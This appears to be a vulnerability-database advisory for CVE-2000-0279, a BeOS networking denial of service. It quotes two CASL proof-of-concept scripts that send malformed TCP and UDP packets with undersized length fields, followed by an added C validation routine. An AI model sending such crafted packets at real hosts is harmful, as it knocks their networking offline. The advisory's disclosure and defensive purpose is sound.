BeOS IP Packet Length Field Vulnerability

Vulnerability ID: 1105773 | Vulnerability type: Other
Published: 2000-04-07 | Updated: 2005-08-24
CVE ID: CVE-2000-0279 | CNNVD-ID: CNNVD-200004-011
Affected platform: BeOS | CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/19841
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200004-011
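|Vulnerability details
BeOS contains a vulnerability that allows a remote attacker to cause a denial of service by sending a malformed packet whose length field is smaller than the length of the headers.
|Exploit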
source: http://www.securityfocus.com/bid/1100/info

The networking process in BeOS can crash if certain malformed packets are transmitted to it. If the length field is set to a number less than the total length of the IP and protocol (TCP or UDP) headers alone, the process will halt and require manual restarting to regain normal functionality. For TCP, the combined TCP and IP header length is 40, and for UDP the combined UDP and IP header length is 28. 

--------------becasl.casl--------------------

#!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy TCPIP;
    
    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 39;
    
    packet = [ IPH ];
    ip_output(packet);

--------------becasl1.casl--------------------

#!/usr/local/casl/bin/casl

    #include "tcpip.casl"
    #include "packets.casl"
    #include "tcp.casl"

    srchost = 10.0.0.1;
    dsthost = 10.0.0.2;

    IPH = copy UDPIP;

    IPH.ip_hl = 5;
    IPH.ip_src = srchost;
    IPH.ip_dst = dsthost;
    IPH.ip_length = 27;

    packet = [ IPH ];
    ip_output(packet);
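
The receive-side validation whose absence the advisory describes, as an added example (not code from BeOS or from the original advisory): each length field is checked against the bytes actually received before it is used as an offset. The function and enum names are hypothetical, and the sample packets are constructed.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum verdict { PKT_OK, PKT_MALFORMED, PKT_BAD_IHL, PKT_BAD_TOTLEN, PKT_BAD_L4 };

/* Validate the length fields of an IPv4 datagram before parsing it further.
 * buf/caplen: the bytes actually received from the link layer. */
enum verdict check_ipv4_lengths(const uint8_t *buf, size_t caplen)
{
    if (caplen < 20 || (buf[0] >> 4) != 4) return PKT_MALFORMED;
    size_t ihl   = (size_t)(buf[0] & 0x0f) * 4;      /* IP header length */
    size_t total = ((size_t)buf[2] << 8) | buf[3];   /* IP total length  */
    if (ihl < 20 || ihl > caplen)      return PKT_BAD_IHL;
    if (total < ihl || total > caplen) return PKT_BAD_TOTLEN;
    if ((((buf[6] & 0x1f) << 8) | buf[7]) != 0)
        return PKT_OK;                               /* later fragment: no L4 header */
    size_t l4 = total - ihl;                         /* bytes left for the transport */
    if (buf[9] == 6) {                               /* TCP: 20 + 20 = 40 minimum */
        if (l4 < 20) return PKT_BAD_L4;
        size_t doff = (size_t)(buf[ihl + 12] >> 4) * 4;
        if (doff < 20 || doff > l4) return PKT_BAD_L4;
    } else if (buf[9] == 17) {                       /* UDP: 20 + 8 = 28 minimum */
        if (l4 < 8) return PKT_BAD_L4;
        size_t ulen = ((size_t)buf[ihl + 4] << 8) | buf[ihl + 5];
        if (ulen < 8 || ulen > l4) return PKT_BAD_L4;
    }
    return PKT_OK;
}

/* Constructed sample: a 40-byte buffer holding a bare IPv4 + TCP/UDP header. */
enum verdict check_sample(uint8_t proto, uint16_t ip_length)
{
    uint8_t b[40];
    memset(b, 0, sizeof b);
    b[0] = 0x45;                                     /* version 4, ip_hl = 5 */
    b[2] = (uint8_t)(ip_length >> 8); b[3] = (uint8_t)(ip_length & 0xff);
    b[9] = proto;
    b[24] = 0; b[25] = 8;                            /* UDP length (unused for TCP) */
    b[32] = 0x50;                                    /* TCP data offset 5 (unused for UDP) */
    return check_ipv4_lengths(b, sizeof b);
}

int main(void)
{
    printf("tcp 40 -> %d, tcp 39 -> %d\n", check_sample(6, 40), check_sample(6, 39));
    printf("udp 28 -> %d, udp 27 -> %d\n", check_sample(17, 28), check_sample(17, 27));
    return 0;
}
```
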
|References

Source: BID
Name: 1100
Link: http://www.securityfocus.com/bid/1100
Source: bebugs.be.com
Link: http://bebugs.be.com/devbugs/detail.php3?oid=2505312
Source: BUGTRAQ
Name: 20000407 BeOS Networking DOS
Link: http://archives.neohapsis.com/archives/bugtraq/2000-04/0029.html